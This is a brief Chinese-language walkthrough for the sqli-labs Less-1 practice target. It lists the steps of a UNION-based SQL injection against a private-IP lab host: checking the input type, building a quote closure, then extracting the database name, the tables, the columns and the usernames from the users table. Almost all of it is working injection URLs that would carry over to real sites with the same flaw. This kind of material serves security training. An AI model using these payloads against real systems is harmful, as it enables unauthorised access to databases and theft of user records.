- 测试交互方法(此靶机为get);
- 判断字符类型;(此靶机没报错,为字符型)
- 构造闭合(次靶机闭合为 ‘ );
- 爆库名;
http://192.168.96.133/sqli-labs-master/Less-1/?id=-1 ' union all select 1,2,database() --+
- 爆表名;
http://192.168.96.133/sqli-labs-master/Less-1/?id=-1 ' union all select 1,2,group_concat(table_name) from information_schema.tables where TABLE_schema = 'security' --+
6. 爆列名;
http://192.168.96.133/sqli-labs-master/Less-1/?id=-1 ' union all select 1,2,group_concat(column_name) from information_schema.columns where TABLE_name = 'users' and table_schema = 'security' --+
7. 爆数据;
http://192.168.96.133/sqli-labs-master/Less-1/?id=-1 ' union all select 1,2,group_concat(username) from users --+